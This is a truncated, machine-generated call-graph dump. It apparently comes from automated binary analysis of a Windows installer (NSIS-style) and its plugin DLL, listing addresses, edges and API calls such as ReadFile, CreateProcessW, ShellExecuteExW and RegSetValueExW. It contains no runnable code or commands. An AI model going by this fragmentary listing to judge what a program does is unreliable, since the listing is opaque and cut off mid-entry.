4815->4901 4817->4825 4818 6fdf2278 4820 6fdf2285 lstrlenW 4818->4820 4818->4827 4819 6fdf2086 4904 6fdf121b GlobalAlloc 4819->4904 4906 6fdf161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4820->4906 4824 6fdf1fc7 GlobalFree 4824->4825 4825->4806 4825->4808 4825->4811 4825->4812 4825->4817 4825->4819 4825->4824 4826 6fdf210e 4825->4826 4825->4827 4830 6fdf122c 2 API calls 4825->4830 4831 6fdf1d2d 4825->4831 4826->4827 4833 6fdf2176 lstrcpyW 4826->4833 4827->4762 4828 6fdf2238 4828->4818 4835 6fdf2262 GetProcAddress 4828->4835 4829 6fdf229f 4829->4827 4830->4825 4831->4825 4899 6fdf158f GlobalSize GlobalAlloc 4831->4899 4833->4827 4834 6fdf208f 4834->4762 4835->4818 4844 6fdf23f8 4836->4844 4837 6fdf122c GlobalAlloc lstrcpynW 4837->4844 4839 6fdf2521 GlobalFree 4840 6fdf17cf 4839->4840 4839->4844 4840->4772 4840->4773 4840->4785 4841 6fdf24cb GlobalAlloc CLSIDFromString 4841->4839 4842 6fdf24a0 GlobalAlloc WideCharToMultiByte 4842->4839 4843 6fdf24ea 4843->4839 4912 6fdf2704 4843->4912 4844->4837 4844->4839 4844->4841 4844->4842 4844->4843 4908 6fdf12ba 4844->4908 4848 6fdf2b0a 4846->4848 4847 6fdf2baf ReadFile 4851 6fdf2bcd 4847->4851 4848->4847 4850 6fdf2c99 4850->4785 4915 6fdf2aa2 4851->4915 4853 6fdf23b3 4852->4853 4854 6fdf23be GlobalAlloc 4853->4854 4855 6fdf17c8 4853->4855 4854->4853 4855->4764 4860 6fdf27a0 4856->4860 4857 6fdf284e 4859 6fdf2854 GlobalSize 4857->4859 4861 6fdf285e 4857->4861 4858 6fdf283b GlobalAlloc 4858->4861 4859->4861 4860->4857 4860->4858 4861->4789 4863 6fdf2d8e 4862->4863 4864 6fdf2dce GlobalFree 4863->4864 4919 6fdf121b GlobalAlloc 4865->4919 4867 6fdf266b lstrcpynW 4870 6fdf25bf 4867->4870 4868 6fdf265a StringFromGUID2 4868->4870 4869 6fdf2638 MultiByteToWideChar 4869->4870 4870->4867 4870->4868 4870->4869 4871 6fdf267e wsprintfW 4870->4871 4872 6fdf26a2 GlobalFree 4870->4872 4873 6fdf26d7 GlobalFree 4870->4873 4874 6fdf1272 2 API calls 4870->4874 4920 6fdf12e1 4870->4920 4871->4870 4872->4870 4873->4780 4874->4870 4924 6fdf121b GlobalAlloc 4876->4924 4878 6fdf15b9 4879 6fdf15c6 2 API calls 4878->4879 4880 6fdf15c3 4879->4880 4881 6fdf1272 4880->4881 4882 6fdf127b GlobalAlloc lstrcpynW 4881->4882 4883 6fdf12b5 GlobalFree 4881->4883 4882->4883 4883->4786 4885 6fdf15d2 wsprintfW 4884->4885 4888 6fdf15ff lstrcpyW 4884->4888 4889 6fdf1618 4885->4889 4888->4889 4889->4790 4891 6fdf2586 4890->4891 4893 6fdf1891 4890->4893 4892 6fdf25a2 GlobalFree 4891->4892 4891->4893 4892->4891 4893->4798 4893->4800 4895 6fdf1272 2 API calls 4894->4895 4896 6fdf155e 4895->4896 4896->4792 4897->4804 4898->4825 4900 6fdf15ad 4899->4900 4900->4831 4907 6fdf121b GlobalAlloc 4901->4907 4903 6fdf123b lstrcpynW 4903->4827 4904->4834 4905->4828 4906->4829 4907->4903 4909 6fdf12c1 4908->4909 4910 6fdf122c 2 API calls 4909->4910 4911 6fdf12df 4910->4911 4911->4844 4913 6fdf2768 4912->4913 4914 6fdf2712 VirtualAlloc 4912->4914 4913->4843 4914->4913 4916 6fdf2aad 4915->4916 4917 6fdf2abd 4916->4917 4918 6fdf2ab2 GetLastError 4916->4918 4917->4850 4918->4917 4919->4870 4921 6fdf130c 4920->4921 4922 6fdf12ea 4920->4922 4921->4870 4922->4921 4923 6fdf12f0 lstrcpyW 4922->4923 4923->4921 4924->4878 5212 4028d5 5213 4028dd 5212->5213 5214 4028e1 FindNextFileW 5213->5214 5215 4028f3 5213->5215 5214->5215 5216 40293a 5214->5216 5218 4063ee lstrcpynW 5216->5218 5218->5215 5219 6fdf2349 5220 6fdf23b3 5219->5220 5221 6fdf23be GlobalAlloc 5220->5221 5222 6fdf23dd 5220->5222 5221->5220 5223 401956 5224 402d3e 17 API calls 5223->5224 5225 40195d lstrlenW 5224->5225 5226 402630 5225->5226 4980 4014d7 4985 402d1c 4980->4985 4982 4014dd Sleep 4984 402bc2 4982->4984 4986 40642b 17 API calls 4985->4986 4987 402d31 4986->4987 4987->4982 5011 40175c 5012 402d3e 17 API calls 5011->5012 5013 401763 5012->5013 5014 405f13 2 API calls 5013->5014 5015 40176a 5014->5015 5016 405f13 2 API calls 5015->5016 5016->5015 5227 401d5d 5228 402d1c 17 API calls 5227->5228 5229 401d6e SetWindowLongW 5228->5229 5230 402bc2 5229->5230 5017 401ede 5018 402d1c 17 API calls 5017->5018 5019 401ee4 5018->5019 5020 402d1c 17 API calls 5019->5020 5021 401ef0 5020->5021 5022 401f07 EnableWindow 5021->5022 5023 401efc ShowWindow 5021->5023 5024 402bc2 5022->5024 5023->5024 5231 401563 5232 402b08 5231->5232 5235 406335 wsprintfW 5232->5235 5234 402b0d 5235->5234 5236 4026e4 5237 402d1c 17 API calls 5236->5237 5238 4026f3 5237->5238 5239 40273d ReadFile 5238->5239 5240 405f67 ReadFile 5238->5240 5241 402832 5238->5241 5242 40277d MultiByteToWideChar 5238->5242 5245 4027a3 SetFilePointer MultiByteToWideChar 5238->5245 5246 402843 5238->5246 5248 402830 5238->5248 5249 405fc5 SetFilePointer 5238->5249 5239->5238 5239->5248 5240->5238 5258 406335 wsprintfW 5241->5258 5242->5238 5245->5238 5247 402864 SetFilePointer 5246->5247 5246->5248 5247->5248 5250 405fe1 5249->5250 5257 405ff9 5249->5257 5251 405f67 ReadFile 5250->5251 5252 405fed 5251->5252 5253 406002 SetFilePointer 5252->5253 5254 40602a SetFilePointer 5252->5254 5252->5257 5253->5254 5255 40600d 5253->5255 5254->5257 5256 405f96 WriteFile 5255->5256 5256->5257 5257->5238 5258->5248 5259 401968 5260 402d1c 17 API calls 5259->5260 5261 40196f 5260->5261 5262 402d1c 17 API calls 5261->5262 5263 40197c 5262->5263 5264 402d3e 17 API calls 5263->5264 5265 401993 lstrlenW 5264->5265 5267 4019a4 5265->5267 5266 4019e5 5267->5266 5271 4063ee lstrcpynW 5267->5271 5269 4019d5 5269->5266 5270 4019da lstrlenW 5269->5270 5270->5266 5271->5269 5272 40166a 5273 402d3e 17 API calls 5272->5273 5274 401670 5273->5274 5275 40674c 2 API calls 5274->5275 5276 401676 5275->5276 4565 403e6b 4566 403e83 4565->4566 4567 403fbe 4565->4567 4566->4567 4568 403e8f 4566->4568 4569 403fcf GetDlgItem GetDlgItem 4567->4569 4578 40400f 4567->4578 4570 403e9a SetWindowPos 4568->4570 4571 403ead 4568->4571 4572 404344 18 API calls 4569->4572 4570->4571 4575 403eb2 ShowWindow 4571->4575 4576 403eca 4571->4576 4577 403ff9 SetClassLongW 4572->4577 4573 404069 4574 404390 SendMessageW 4573->4574 4584 403fb9 4573->4584 4609 40407b 4574->4609 4575->4576 4580 403ed2 DestroyWindow 4576->4580 4581 403eec 4576->4581 4582 40140b 2 API calls 4577->4582 4578->4573 4579 401389 2 API calls 4578->4579 4583 404041 4579->4583 4585 4042cd 4580->4585 4586 403ef1 SetWindowLongW 4581->4586 4587 403f02 4581->4587 4582->4578 4583->4573 4588 404045 SendMessageW 4583->4588 4585->4584 4596 4042fe ShowWindow 4585->4596 4586->4584 4591 403fab 4587->4591 4592 403f0e GetDlgItem 4587->4592 4588->4584 4589 40140b 2 API calls 4589->4609 4590 4042cf DestroyWindow EndDialog 4590->4585 4645 4043ab 4591->4645 4593 403f21 SendMessageW IsWindowEnabled 4592->4593 4594 403f3e 4592->4594 4593->4584 4593->4594 4598 403f4b 4594->4598 4599 403f92 SendMessageW 4594->4599 4600 403f5e 4594->4600 4610 403f43 4594->4610 4596->4584 4597 40642b 17 API calls 4597->4609 4598->4599 4598->4610 4599->4591 4603 403f66 4600->4603 4604 403f7b 4600->4604 4602 404344 18 API calls 4602->4609 4607 40140b 2 API calls 4603->4607 4606 40140b 2 API calls 4604->4606 4605 403f79 4605->4591 4608 403f82 4606->4608 4607->4610 4608->4591 4608->4610 4609->4584 4609->4589 4609->4590 4609->4597 4609->4602 4627 40420f DestroyWindow 4609->4627 4636 404344 4609->4636 4642 40431d 4610->4642 4612 4040f6 GetDlgItem 4613 404113 ShowWindow KiUserCallbackDispatcher 4612->4613 4614 40410b 4612->4614 4639 404366 KiUserCallbackDispatcher 4613->4639 4614->4613 4616 40413d EnableWindow 4621 404151 4616->4621 4617 404156 GetSystemMenu EnableMenuItem SendMessageW 4618 404186 SendMessageW 4617->4618 4617->4621 4618->4621 4620 403e4c 18 API calls 4620->4621 4621->4617 4621->4620 4640 404379 SendMessageW 4621->4640 4641 4063ee lstrcpynW 4621->4641 4623 4041b5 lstrlenW 4624 40642b 17 API calls 4623->4624 4625 4041cb SetWindowTextW 4624->4625 4626 401389 2 API calls 4625->4626 4626->4609 4627->4585 4628 404229 CreateDialogParamW 4627->4628 4628->4585 4629 40425c 4628->4629 4630 404344 18 API calls 4629->4630 4631 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4630->4631 4632 401389 2 API calls 4631->4632 4633 4042ad 4632->4633 4633->4584 4634 4042b5 ShowWindow 4633->4634 4635 404390 SendMessageW 4634->4635 4635->4585 4637 40642b 17 API calls 4636->4637 4638 40434f SetDlgItemTextW 4637->4638 4638->4612 4639->4616 4640->4621 4641->4623 4643 404324 4642->4643 4644 40432a SendMessageW 4642->4644 4643->4644 4644->4605 4646 40446e 4645->4646 4647 4043c3 GetWindowLongW 4645->4647 4646->4584 4647->4646 4648 4043d8 4647->4648 4648->4646 4649 404405 GetSysColor 4648->4649 4650 404408 4648->4650 4649->4650 4651 404418 SetBkMode 4650->4651 4652 40440e SetTextColor 4650->4652 4653 404430 GetSysColor 4651->4653 4654 404436 4651->4654 4652->4651 4653->4654 4655 404447 4654->4655 4656 40443d SetBkColor 4654->4656 4655->4646 4657 404461 CreateBrushIndirect 4655->4657 4658 40445a DeleteObject 4655->4658 4656->4655 4657->4646 4658->4657 5277 4023ec 5278 402d3e 17 API calls 5277->5278 5279 4023fb 5278->5279 5280 402d3e 17 API calls 5279->5280 5281 402404 5280->5281 5282 402d3e 17 API calls 5281->5282 5283 40240e GetPrivateProfileStringW 5282->5283 5284 4047ee 5285 404824 5284->5285 5286 4047fe 5284->5286 5288 4043ab 8 API calls 5285->5288 5287 404344 18 API calls 5286->5287 5289 40480b SetDlgItemTextW 5287->5289 5290 404830 5288->5290 5289->5285 4690 40176f 4691 402d3e 17 API calls 4690->4691 4692 401776 4691->4692 4693 401796 4692->4693 4694 40179e 4692->4694 4729 4063ee lstrcpynW 4693->4729 4730 4063ee lstrcpynW 4694->4730 4697 40179c 4700 40669d 5 API calls 4697->4700 4698 4017a9 4699 405cc3 3 API calls 4698->4699 4701 4017af lstrcatW 4699->4701 4718 4017bb 4700->4718 4701->4697 4702 40674c 2 API calls 4702->4718 4703 405ebf 2 API calls 4703->4718 4705 4017cd CompareFileTime 4705->4718 4706 40188d 4707 405456 24 API calls 4706->4707 4709 401897 4707->4709 4708 401864 4710 405456 24 API calls 4708->4710 4717 401879 4708->4717 4712 40324c 31 API calls 4709->4712 4710->4717 4711 4063ee lstrcpynW 4711->4718 4713 4018aa 4712->4713 4714 4018be SetFileTime 4713->4714 4716 4018d0 CloseHandle 4713->4716 4714->4716 4715 40642b 17 API calls 4715->4718 4716->4717 4719 4018e1 4716->4719 4718->4702 4718->4703 4718->4705 4718->4706 4718->4708 4718->4711 4718->4715 4724 405a54 MessageBoxIndirectW 4718->4724 4728 405ee4 GetFileAttributesW CreateFileW 4718->4728 4720 4018e6 4719->4720 4721 4018f9 4719->4721 4722 40642b 17 API calls 4720->4722 4723 40642b 17 API calls 4721->4723 4725 4018ee lstrcatW 4722->4725 4726 401901 4723->4726 4724->4718 4725->4726 4726->4717 4727 405a54 MessageBoxIndirectW 4726->4727 4727->4717 4728->4718 4729->4697 4730->4698 5291 401a72 5292 402d1c 17 API calls 5291->5292 5293 401a7b 5292->5293 5294 402d1c 17 API calls 5293->5294 5295 401a20 5294->5295 5296 6fdf166d 5297 6fdf1516 GlobalFree 5296->5297 5300 6fdf1685 5297->5300 5298 6fdf16cb GlobalFree 5299 6fdf16a0 5299->5298 5300->5298 5300->5299 5301 6fdf16b7 VirtualFree 5300->5301 5301->5298 4925 401573 4926 401583 ShowWindow 4925->4926 4927 40158c 4925->4927 4926->4927 4928 40159a ShowWindow 4927->4928 4929 402bc2 4927->4929 4928->4929 5302 4014f5 SetForegroundWindow 5303 402bc2 5302->5303 5304 401ff6 5305 402d3e 17 API calls 5304->5305 5306 401ffd 5305->5306 5307 40674c 2 API calls 5306->5307 5308 402003 5307->5308 5310 402014 5308->5310 5311 406335 wsprintfW 5308->5311 5311->5310 5312 4022f7 5313 402d3e 17 API calls 5312->5313 5314 4022fd 5313->5314 5315 402d3e 17 API calls 5314->5315 5316 402306 5315->5316 5317 402d3e 17 API calls 5316->5317 5318 40230f 5317->5318 5319 40674c 2 API calls 5318->5319 5320 402318 5319->5320 5321 402329 lstrlenW lstrlenW 5320->5321 5325 40231c 5320->5325 5323 405456 24 API calls 5321->5323 5322 405456 24 API calls 5326 402324 5322->5326 5324 402367 SHFileOperationW 5323->5324 5324->5325 5324->5326 5325->5322 5325->5326 5327 401b77 5328 402d3e 17 API calls 5327->5328 5329 401b7e 5328->5329 5330 402d1c 17 API calls 5329->5330 5331 401b87 wsprintfW 5330->5331 5332 402bc2 5331->5332 5333 40447a lstrcpynW lstrlenW 5334 40167b 5335 402d3e 17 API calls 5334->5335 5336 401682 5335->5336 5337 402d3e 17 API calls 5336->5337 5338 40168b 5337->5338 5339 402d3e 17 API calls 5338->5339 5340 401694 MoveFileW 5339->5340 5341 4016a7 5340->5341 5347 4016a0 5340->5347 5342 40674c 2 API calls 5341->5342 5344 4022ee 5341->5344 5345 4016b6 5342->5345 5343 401423 24 API calls 5343->5344 5345->5344 5346 4061b4 36 API calls 5345->5346 5346->5347 5347->5343 5348 403a7b 5349 403a86 5348->5349 5350 403a8a 5349->5350 5351 403a8d GlobalAlloc 5349->5351 5351->5350 5352 40237b 5353 402382 5352->5353 5356 402395 5352->5356 5354 40642b 17 API calls 5353->5354 5355 40238f 5354->5355 5355->5356 5357 405a54 MessageBoxIndirectW 5355->5357 5357->5356 5358 6fdf10e1 5359 6fdf1111 5358->5359 5360 6fdf11d8 GlobalFree 5359->5360 5361 6fdf12ba 2 API calls 5359->5361 5362 6fdf11d3 5359->5362 5363 6fdf1164 GlobalAlloc 5359->5363 5364 6fdf11f8 GlobalFree 5359->5364 5365 6fdf1272 2 API calls 5359->5365 5366 6fdf12e1 lstrcpyW 5359->5366 5367 6fdf11c4 GlobalFree 5359->5367 5361->5359 5362->5360 5363->5359 5364->5359 5365->5367 5366->5359 5367->5359 5368 4019ff 5369 402d3e 17 API calls 5368->5369 5370 401a06 5369->5370 5371 402d3e 17 API calls 5370->5371 5372 401a0f 5371->5372 5373 401a16 lstrcmpiW 5372->5373 5374 401a28 lstrcmpW 5372->5374 5375 401a1c 5373->5375 5374->5375 5376 401000 5377 401037 BeginPaint GetClientRect 5376->5377 5378 40100c DefWindowProcW 5376->5378 5380 4010f3 5377->5380 5381 401179 5378->5381 5382 401073 CreateBrushIndirect FillRect DeleteObject 5380->5382 5383 4010fc 5380->5383 5382->5380 5384 401102 CreateFontIndirectW 5383->5384 5385 401167 EndPaint 5383->5385 5384->5385 5386 401112 6 API calls 5384->5386 5385->5381 5386->5385 5387 401d81 5388 401d94 GetDlgItem 5387->5388 5389 401d87 5387->5389 5391 401d8e 5388->5391 5390 402d1c 17 API calls 5389->5390 5390->5391 5392 401dd5 GetClientRect LoadImageW SendMessageW 5391->5392 5393 402d3e 17 API calls 5391->5393 5395 401e33 5392->5395 5397 401e3f 5392->5397 5393->5392 5396 401e38 DeleteObject 5395->5396 5395->5397 5396->5397 5398 402482 5399 402d3e 17 API calls 5398->5399 5400 402494 5399->5400 5401 402d3e 17 API calls 5400->5401 5402 40249e 5401->5402 5415 402dce 5402->5415 5405 402bc2 5406 4024d6 5407 4024e2 5406->5407 5409 402d1c 17 API calls 5406->5409 5410 402501 RegSetValueExW 5407->5410 5412 40324c 31 API calls 5407->5412 5408 402d3e 17 API calls 5411 4024cc lstrlenW 5408->5411 5409->5407 5413 402517 RegCloseKey 5410->5413 5411->5406 5412->5410 5413->5405 5416 402de9 5415->5416 5419 406289 5416->5419 5420 406298 5419->5420 5421 4062a3 RegCreateKeyExW 5420->5421 5422 4024ae 5420->5422 5421->5422 5422->5405 5422->5406 5422->5408 5423 402902 5424 402d3e 17 API calls 5423->5424 5425 402909 FindFirstFileW 5424->5425 5426 402931 5425->5426 5429 40291c 5425->5429 5427 40293a 5426->5427 5431 406335 wsprintfW 5426->5431 5432 4063ee lstrcpynW 5427->5432 5431->5427 5432->5429 5433 401503 5434 40150b 5433->5434 5436 40151e 5433->5436 5435 402d1c 17 API calls 5434->5435 5435->5436 5437 404503 5438 40451b 5437->5438 5444 404635 5437->5444 5445 404344 18 API calls 5438->5445 5439 40469f 5440 404769 5439->5440 5441 4046a9 GetDlgItem 5439->5441 5447 4043ab 8 API calls 5440->5447 5442 4046c3 5441->5442 5443 40472a 5441->5443 5442->5443 5451 4046e9 SendMessageW LoadCursorW SetCursor 5442->5451 5443->5440 5452 40473c 5443->5452 5444->5439 5444->5440 5448 404670 GetDlgItem SendMessageW 5444->5448 5446 404582 5445->5446 5449 404344 18 API calls 5446->5449 5450 404764 5447->5450 5470 404366 KiUserCallbackDispatcher 5448->5470 5454 40458f CheckDlgButton 5449->5454 5474 4047b2 5451->5474 5456 404752 5452->5456 5457 404742 SendMessageW 5452->5457 5468 404366 KiUserCallbackDispatcher 5454->5468 5456->5450 5462 404758 SendMessageW 5456->5462 5457->5456 5458 40469a 5471 40478e 5458->5471 5462->5450 5463 4045ad GetDlgItem 5469 404379 SendMessageW 5463->5469 5465 4045c3 SendMessageW 5466 4045e0 GetSysColor 5465->5466 5467 4045e9 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5465->5467 5466->5467 5467->5450 5468->5463 5469->5465 5470->5458 5472 4047a1 SendMessageW 5471->5472 5473 40479c 5471->5473 5472->5439 5473->5472 5477 405a1a ShellExecuteExW 5474->5477 5476 404718 LoadCursorW SetCursor 5476->5443 5477->5476 5478 402889 5479 402890 5478->5479 5485 402b0d 5478->5485 5480 402d1c 17 API calls 5479->5480 5481 402897 5480->5481 5482 4028a6 SetFilePointer 5481->5482 5483 4028b6 5482->5483 5482->5485 5486 406335 wsprintfW 5483->5486 5486->5485 5487 404b8b 5488 404bb7 5487->5488 5489 404b9b 5487->5489 5491 404bea 5488->5491 5492 404bbd SHGetPathFromIDListW 5488->5492 5498 405a38 GetDlgItemTextW 5489->5498 5493 404bd4 SendMessageW 5492->5493 5494 404bcd 5492->5494 5493->5491 5496 40140b 2 API calls 5494->5496 5495 404ba8 SendMessageW 5495->5488 5496->5493 5498->5495 5499 40190c 5500 401943 5499->5500 5501 402d3e 17 API calls 5500->5501 5502 401948 5501->5502 5503 405b00 67 API calls 5502->5503 5504 401951 5503->5504 5505 40190f 5506 402d3e 17 API calls 5505->5506 5507 401916 5506->5507 5508 405a54 MessageBoxIndirectW 5507->5508 5509 40191f 5508->5509 5510 401491 5511 405456 24 API calls 5510->5511 5512 401498 5511->5512 5513 401f12 5514 402d3e 17 API calls 5513->5514 5515 401f18 5514->5515 5516 402d3e 17 API calls 5515->5516 5517 401f21 5516->5517 5518 402d3e 17 API calls 5517->5518 5519 401f2a 5518->5519 5520 402d3e 17 API calls 5519->5520 5521 401f33 5520->5521 5522 401423 24 API calls 5521->5522 5523 401f3a 5522->5523 5530 405a1a ShellExecuteExW 5523->5530 5525 401f82 5526 402925 5525->5526 5531 40688e WaitForSingleObject 5525->5531 5528 401f9f CloseHandle 5528->5526 5530->5525 5532 4068a8 5531->5532 5533 4068ba GetExitCodeProcess 5532->5533 5534 40681f 2 API calls 5532->5534 5533->5528 5535 4068af WaitForSingleObject 5534->5535 5535->5532 5536 402614 5537 402d3e 17 API calls 5536->5537 5538 40261b 5537->5538 5541 405ee4 GetFileAttributesW CreateFileW 5538->5541 5540 402627 5541->5540 4930 405595 4931 4055b6 GetDlgItem GetDlgItem GetDlgItem 4930->4931 4932 40573f 4930->4932 4976 404379 SendMessageW 4931->4976 4934 405770 4932->4934 4935 405748 GetDlgItem CreateThread CloseHandle 4932->4935 4937 40579b 4934->4937 4939 4057c0 4934->4939 4940 405787 ShowWindow ShowWindow 4934->4940 4935->4934 4979 405529 5 API calls 4935->4979 4936 405626 4944 40562d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4936->4944 4938 4057a7 4937->4938 4945 4057fb 4937->4945 4941 4057d5 ShowWindow 4938->4941 4942 4057af 4938->4942 4943 4043ab 8 API calls 4939->4943 4978 404379 SendMessageW 4940->4978 4949 4057f5 4941->4949 4950 4057e7 4941->4950 4947 40431d SendMessageW 4942->4947 4948 4057ce 4943->4948 4951 40569b 4944->4951 4952 40567f SendMessageW SendMessageW 4944->4952 4945->4939 4953 405809 SendMessageW 4945->4953 4947->4939 4955 40431d SendMessageW 4949->4955 4954 405456 24 API calls 4950->4954 4956 4056a0 SendMessageW 4951->4956 4957 4056ae 4951->4957 4952->4951 4953->4948 4958 405822 CreatePopupMenu 4953->4958 4954->4949 4955->4945 4956->4957 4960 404344 18 API calls 4957->4960 4959 40642b 17 API calls 4958->4959 4961 405832 AppendMenuW 4959->4961 4962 4056be 4960->4962 4963 405862 TrackPopupMenu 4961->4963 4964 40584f GetWindowRect 4961->4964 4965 4056c7 ShowWindow 4962->4965 4966 4056fb GetDlgItem SendMessageW 4962->4966 4963->4948 4967 40587d 4963->4967 4964->4963 4968 4056ea 4965->4968 4969 4056dd ShowWindow 4965->4969 4966->4948 4970 405722 SendMessageW SendMessageW 4966->4970 4971 405899 SendMessageW 4967->4971 4977 404379 SendMessageW 4968->4977 4969->4968 4970->4948 4971->4971 4972 4058b6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4971->4972 4974 4058db SendMessageW 4972->4974 4974->4974 4975 405904 GlobalUnlock SetClipboardData CloseClipboard 4974->4975 4975->4948 4976->4936 4977->4966 4978->4937 5542 402596 5543 402d7e 17 API calls 5542->5543 5544 4025a0 5543->5544 5545 402d1c 17 API calls 5544->5545 5546 4025a9 5545->5546 5547 4025d1 RegEnumValueW 5546->5547 5548 4025c5 RegEnumKeyW 5546->5548 5549 402925 5546->5549 5550 4025e6 RegCloseKey 5547->5550 5548->5550 5550->5549 5552 401d17 5553 402d1c 17 API calls 5552->5553 5554 401d1d IsWindow 5553->5554 5555 401a20 5554->5555 4988 401b9b 4989 401bec 4988->4989 4994 401ba8 4988->4994 4990 401c16 GlobalAlloc 4989->4990 4991 401bf1 4989->4991 4993 40642b 17 API calls 4990->4993 5001 402395 4991->5001 5009 4063ee lstrcpynW 4991->5009 4992 40642b 17 API calls 4996 40238f 4992->4996 4997 401c31 4993->4997 4994->4997 4998 401bbf 4994->4998 4996->5001 5002 405a54 MessageBoxIndirectW 4996->5002 4997->4992 4997->5001 5007 4063ee lstrcpynW 4998->5007 4999 401c03 GlobalFree 4999->5001 5002->5001 5003 401bce 5008 4063ee lstrcpynW 5003->5008 5005 401bdd 5010 4063ee lstrcpynW 5005->5010 5007->5003 5008->5005 5009->4999 5010->5001 5556 402b9d SendMessageW 5557 402bc2 5556->5557 5558 402bb7 InvalidateRect 5556->5558 5558->5557 5559 40149e 5560 402395 5559->5560 5561 4014ac PostQuitMessage 5559->5561 5561->5560 5562 6fdf1000 5565 6fdf101b 5562->5565 5566 6fdf1516 GlobalFree 5565->5566 5567 6fdf1020 5566->5567 5568 6fdf1027 GlobalAlloc 5567->5568 5569 6fdf1024 5567->5569 5568->5569 5570 6fdf153d 3 API calls 5569->5570 5571 6fdf1019 5570->5571 4260 4034a2 SetErrorMode GetVersion 4261 4034e1 4260->4261 4262 4034e7 4260->4262 4263 4067e3 5 API calls 4261->4263 4264 406773 3 API calls 4262->4264 4263->4262 4265 4034fd lstrlenA 4264->4265 4265->4262 4266 40350d 4265->4266 4267 4067e3 5 API calls 4266->4267 4268 403514 4267->4268 4269 4067e3 5 API calls 4268->4269 4270 40351b 4269->4270 4271 4067e3 5 API calls 4270->4271 4272 403527 #17 OleInitialize SHGetFileInfoW 4271->4272 4350 4063ee lstrcpynW 4272->4350 4275 403573 GetCommandLineW 4351 4063ee lstrcpynW 4275->4351 4277 403585 4278 405cf0 CharNextW 4277->4278 4279 4035aa CharNextW 4278->4279 4280 4036d4 GetTempPathW 4279->4280 4288 4035c3 4279->4288 4352 403471 4280->4352 4282 4036ec 4283 4036f0 GetWindowsDirectoryW lstrcatW 4282->4283 4284 403746 DeleteFileW 4282->4284 4285 403471 12 API calls 4283->4285 4362 403015 GetTickCount GetModuleFileNameW 4284->4362 4289 40370c 4285->4289 4286 405cf0 CharNextW 4286->4288 4288->4286 4293 4036bf 4288->4293 4295 4036bd 4288->4295 4289->4284 4291 403710 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4289->4291 4290 40375a 4299 405cf0 CharNextW 4290->4299 4303 40380d 4290->4303 4334 4037fd 4290->4334 4294 403471 12 API calls 4291->4294 4446 4063ee lstrcpynW 4293->4446 4297 40373e 4294->4297 4295->4280 4297->4284 4297->4303 4313 403779 4299->4313 4301 403947 4305 4039cb ExitProcess 4301->4305 4306 40394f GetCurrentProcess OpenProcessToken 4301->4306 4302 403827 4456 405a54 4302->4456 4449 4039e3 4303->4449 4311 403967 LookupPrivilegeValueW AdjustTokenPrivileges 4306->4311 4312 40399b 4306->4312 4309 4037d7 4314 405dcb 18 API calls 4309->4314 4310 40383d 4315 4059bf 5 API calls 4310->4315 4311->4312 4316 4067e3 5 API calls 4312->4316 4313->4309 4313->4310 4317 4037e3 4314->4317 4318 403842 lstrcatW 4315->4318 4319 4039a2 4316->4319 4317->4303 4447 4063ee lstrcpynW 4317->4447 4320 403853 lstrcatW 4318->4320 4321 40385e lstrcatW lstrcmpiW 4318->4321 4322 4039b7 ExitWindowsEx 4319->4322 4323 4039c4 4319->4323 4320->4321 4321->4303 4325 40387a 4321->4325 4322->4305 4322->4323 4465 40140b 4323->4465 4328 403886 4325->4328 4329 40387f 4325->4329 4327 4037f2 4448 4063ee lstrcpynW 4327->4448 4330 4059a2 2 API calls 4328->4330 4332 405925 4 API calls 4329->4332 4333 40388b SetCurrentDirectoryW 4330->4333 4335 403884 4332->4335 4336 4038a6 4333->4336 4337 40389b 4333->4337 4390 403abd 4334->4390 4335->4333 4461 4063ee lstrcpynW 4336->4461 4460 4063ee lstrcpynW 4337->4460 4340 40642b 17 API calls 4341 4038e5 DeleteFileW 4340->4341 4342 4038f2 CopyFileW 4341->4342 4347 4038b4 4341->4347 4342->4347 4343 40393b 4344 4061b4 36 API calls 4343->4344 4344->4303 4345 4061b4 36 API calls 4345->4347 4346 40642b 17 API calls 4346->4347 4347->4340 4347->4343 4347->4345 4347->4346 4349 403926 CloseHandle 4347->4349 4462 4059d7 CreateProcessW 4347->4462 4349->4347 4350->4275 4351->4277 4353 40669d 5 API calls 4352->4353 4355 40347d 4353->4355 4354 403487 4354->4282 4355->4354 4356 405cc3 3 API calls 4355->4356 4357 40348f 4356->4357 4358 4059a2 2 API calls 4357->4358 4359 403495 4358->4359 4468 405f13 4359->4468 4472 405ee4 GetFileAttributesW CreateFileW 4362->4472 4364 403055 4385 403065 4364->4385 4473 4063ee lstrcpynW 4364->4473 4366 40307b 4367 405d0f 2 API calls 4366->4367 4368 403081 4367->4368 4474 4063ee lstrcpynW 4368->4474 4370 40308c GetFileSize 4371 403186 4370->4371 4383 4030a3 4370->4383 4475 402fb1 4371->4475 4373 40318f 4375 4031bf GlobalAlloc 4373->4375 4373->4385 4510 40345a SetFilePointer 4373->4510 4486 40345a SetFilePointer 4375->4486 4376 4031f2 4381 402fb1 6 API calls 4376->4381 4379 4031a8 4382 403444 ReadFile 4379->4382 4380 4031da 4487 40324c 4380->4487 4381->4385 4386 4031b3 4382->4386 4383->4371 4383->4376 4383->4385 4387 402fb1 6 API calls 4383->4387 4507 403444 4383->4507 4385->4290 4386->4375 4386->4385 4387->4383 4388 4031e6 4388->4385 4388->4388 4389 403223 SetFilePointer 4388->4389 4389->4385 4391 4067e3 5 API calls 4390->4391 4392 403ad1 4391->4392 4393 403ad7 GetUserDefaultUILanguage 4392->4393 4394 403ae9 4392->4394 4516 406335 wsprintfW 4393->4516 4395 4062bc 3 API calls 4394->4395 4397 403b19 4395->4397 4399 403b38 lstrcatW 4397->4399 4400 4062bc 3 API calls 4397->4400 4398 403ae7 4517 403d93 4398->4517 4399->4398 4400->4399 4403 405dcb 18 API calls 4404 403b6a 4403->4404 4405 403bfe 4404->4405 4407 4062bc 3 API calls 4404->4407 4406 405dcb 18 API calls 4405->4406 4408 403c04 4406->4408 4409 403b9c 4407->4409 4410 403c14 LoadImageW 4408->4410 4411 40642b 17 API calls 4408->4411 4409->4405 4417 403bbd lstrlenW 4409->4417 4418 405cf0 CharNextW 4409->4418 4412 403cba 4410->4412 4413 403c3b RegisterClassW 4410->4413 4411->4410 4416 40140b 2 API calls 4412->4416 4414 403c71 SystemParametersInfoW CreateWindowExW 4413->4414 4415 